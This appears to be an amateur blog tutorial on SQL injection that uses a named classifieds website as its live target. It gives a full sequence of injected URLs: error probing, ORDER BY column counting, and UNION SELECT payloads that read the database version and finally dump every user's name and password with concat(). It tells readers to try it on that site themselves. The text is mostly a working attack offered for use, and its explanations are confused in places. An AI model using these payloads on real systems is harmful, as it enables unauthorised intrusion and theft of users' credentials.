Technology Advances

Best SQL Injection Tutorial ever...


For my purposes, i will use http://www.buysellusa.net as an example, this site is hackable.
if you try on this site, and it does NOT work, that means either i spelt the url wrong (silly me) or that the site has been fixed

Dont be to harsh on me for making it so nooby, i didnt get any of the articles explaining sql injections when i was first learning
if you get lost, keep reading, it might explain what you do not understand ahead.

Well, yeah, self explanitory. OK, here, in this article, i will teach you how to hack a website.
The method we are going to use is called mysql injection. Sql mean, "structured query language".
What this means, is that this programming language lets you send queries (a request for information and such) to a database and access hidden, or "confidential files" such as passwords, and usernames, if you catch my drift. A database is an orginized body of related data, or in simpler terms, like all the vital info stored on the website, and vital coding, or "scripting"(the programming) i think (im not very smart). Well, when making a mysql injection, you have to determine (find out) wether or not a site is vulnerable first (vulnerable, as in, you can make a proper mysql injection, or more simplified, if the web site can be hacked). To find out wether or not a site is vulnerable, you need to change the url. Simple isnt it. But, to get proper results, you need to find a url, that contains a VARIABLE <--------this is VERY important) An example of a url that contains a variable, is

http://buysellusa.net/classifieds/showCat.php?cat_id=10

The variable in this Url (website adress) is "cat_id=10"
A variable is a snipet of code or information that is assigned a value. like for example

tom=1

now, lets say this;

1+tom=2

do you understand?

it is a value pretty much. The value of this variable "cat_id=10" is 10.
Now, to determine wether or not you CAN hack this site. What you need to do, is make a change to the url, like i said before
now, this url, "http://buysellusa.net/classifieds/showCat.php?cat_id=10" must have something ADDED to it. At the end of the url,
add ' thats right, just add '
so the new url is:
http://buysellusa.net/classifieds/showCa...cat_id=10'
now if the site you want to hack is vulnerable, you should get and error message on the page. there are other ways to determine wether or not a site is vulnerable to mysql injections, dont get me wrong, but for my purposes, this is the way i will show you.

Now, on this particular url, when you add the magical character ' you should get an error message, something simaler to this:



Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/buysell/domains/buysellusa.net/public_html/classifieds/showCat.php on line 57
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\'' at line 1
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/buysell/domains/buysellusa.net/classifieds2/lib/func_tree.php on line 424



Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/buysell/domains/buysellusa.net/public_html/classifieds/showCat.php on line 85
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND std_items.cat_id=std_categories.cat_id LIMIT
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/buysell/domains/buysellusa.net/classifieds2/lib/func_getResults.php on line 143

now remember, this is very vauge. It can be almost anything, as long as it mentions MySQL. If it mentions some random crap about vb its not vulnerable (AS FAR AS I KNOW)

now when you get that error your in buisness. This means your target site, or the site im using as an example, is vulnerable! HURRAY! now you can get to the hacking

ok next you need to find the number of columns. This i dont fully understand myself, like i said, i am an uber noob.
I THINK what the columns are, are the columns of data inside a chart. Like a chart stored within the database, that can hold like, usernames , or passwords. Anyhow you need to find out how many there are (how many columns for what chart? wtf im confused too, you just have to do it)

ok; to find the amount of charts, you have to use the statement in SQL which is" order by" , this tells the database how to order the results (im still confused, your not alone)

now, in the url, delete you magical character ' i know, it dosent deserve it, but do you want to hack or not? ok now the url is once again
http://buysellusa.net/classifieds/showCat.php?cat_id=10
Now, add the "Order by" command to the end
so the url should look like:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 order by
now to find out the number of coloums, you would add a one to "Order by" so it would become "Order by 1"
now, the url is :
http://buysellusa.net/classifieds/showCat.php?cat_id=10 order by 1
but thats not all. You need to add some characters at the end, which tell the database that it is a query, and not you trying to connect to another page of the site. To do this, you use one of the following" -- " or " /* " these denote that the text is a comment. These are used in programming when you need to write yourself something to remember inside your code, or script.
it dosent matter what it is for, if you dont understand, you just need to know when to use it.

so add either -- or /* to the end of your url

(there are two different methods, because some servers block one of the methods, so if one of the comment symbols* -- * or * /* * dont work, try the other one. i personally prefer -- its faster

the url is now:

http://buysellusa.net/classifieds/showCat.php?cat_id=10 order by 1--
OR
http://buysellusa.net/classifieds/showCat.php?cat_id=10 order by 1/*

make sure not to leave a space between your 1 and your -- or /*
now the first time, it is not going to work obviously.
To find out the number of columns, you need to increase the number "1" by 1 every time you try

so the first time you would make the url:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 order by 1/*
second time:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 order by 2/*
third time:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 order by 3/*

and so on and so on, untill you encounter ANOTHER error. It should say something about mysql.
now you know the number of coloums. Lets say it took you 5 tires, on the fifth try, there was an error, then you have 4 columns, because the 5th try is an error, that means the column does not exist in this table (a table located inside the database)
now, you have the amount of columns, which is great.

Now we have to use the UNION function, which allows you to select more data within one sql statment. The statment in this case being what you add to the end of the url(hope your not lost)
Now when we use the union function, the syntax (how we use it, where we use it) is like so:

http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select
but we want it to look like this:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,2/*
what this does is select the columns in the table, column 1,2,3 and column 4
now of course, you only want to select the number of columns that you have determined exist. In my example, i determined 4.
Therefore, i selected column 1,2,3 and 4.
to tell if this command is working, look for numbers on the webpage, that werent there before. The numbers could be 1 or any number up to the amount of columns you found. So if there were 8 columns, the new number could be anywhere from 1-8.

Now you need to check for the mysql version. This is important, because if it is version 5, you job will be ALOT esier
now this part is sometimes tricky. Look to find the new number that appeared. Now, in your url
which should look like:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 union select all 1,2/*
you need to replace the number in the url that matches the number that appeared on the web page (so if the number that appeared is 2, then you replace the 2 in "union select all 1,2/*"

what you replace it with is:
@@version or version() if @@version yeilded no results.

we should get someting like 4.1.33-log or 5.0.45 or similar.
it should look like this:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,@@version/*
if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."
what we need is convert() function

i.e.

http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,convert(@@version using latin1)/*

(yeah, im confused too, dont worry, you might not have to use this)

or with hex() and unhex()

i.e.

http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,unhex(hex(@@version))/*

and you will get the MySQL version :D
The numbers telling you the version will appear on the web page, most lilkey where the other number appeared.

Now, one of the hardest parts, you need to find out the name of the table in which you wish to see the information of. Be it the table that stores passwords, or usernames, or both. you need to find out. This part can come down to guessing. But remember, always make an educated guess. Dont guess something random like spongepurple guess something like password or pswrd or user_name or user_names, you catch my drift? so in order to guess the name, use a syntax like this:

http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,2 from randomguess/*
on this site, i know for a fact, that the user name table is
http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,2 from std_users/*

std means standard

now, you should get MORE numbers. But what do you do with them? you need to extract (put the data into a readable format)
the data. To do this, you need the column name. On this site, and on lots more sites, you can get a rough idea of what the column name is by reading the source of the webpage. The source, is the coding. you can read this by right clicking on the page and hit "Veiw Source Code". Now you need to find the register coding
to do this you might have to open up a new internet clien (have to internets running at once) or on firefox, another tab.
On your second internet, go to the "Creat account" page and veiw the source
on This website, http://www.buysellusa.com the code is as follows:

<INPUT TYPE="TEXT" NAME="new_user_name" value="" SIZE="15">
</td></tr>
<tr><td valign="top" align="right">
<FONT CLASS="small">
Password:
</FONT></td>
<td valign="top" align="right">
<INPUT TYPE="PASSWORD" NAME="password1" value="" SIZE="15">


here we can clearly see the words "new_user_name" and "password1"
from "new_user_name" im going to keep "User_name" because that seems logical

now to see if im right, i will need to check

http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,user_name,2 from std_users/*

notice where i put "user_name" i put it inbetween the two columns, column 1 and column 2. Then i made sure to state WHERE i am selecting this data (from the column named "user_name") from, the std_users table. and VIOLA! you have every single account user name registered on the site. But now, we need the password.

now before, when we looked at the source code, we saw two interesting things, "New_user_name" and "password1"
now we need the "password1"
i will get rid of the one, because why would the column name have a 1 in it?
so basicially, you do the same thing that you did with the user names.

http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,user_name,2 from std_users/*
but instead of that, its:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,password,2 from std_users/*
and ONCE AGAIN! VIOLA! you now have the password to each and every account on the site.

but the lesson is not over, now, to make it easier, we will reformat your results, so they can be better read.

to do this, simply use the contact function.

http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,concat(user_name,0x3a,password),2 from std_users/*

what this does, in a sense, is contact thoes columns from the chart you specify (in this case std_users) and displays there information, but, now, you can display them both at the same time, because they are being simotaneously contacted. And, in this context, it syncronizez the username to its password like so:

username:password

the 0x3a is just a hex code, it is equal to a colon, so your results will look nice.
and thats all.
If you have done this right, you should have just hacked a site.

for your first time, try on http://www.buysellusa.net its easy :P
on http://www.buysellusa.net, make sure to use /* comment symbol!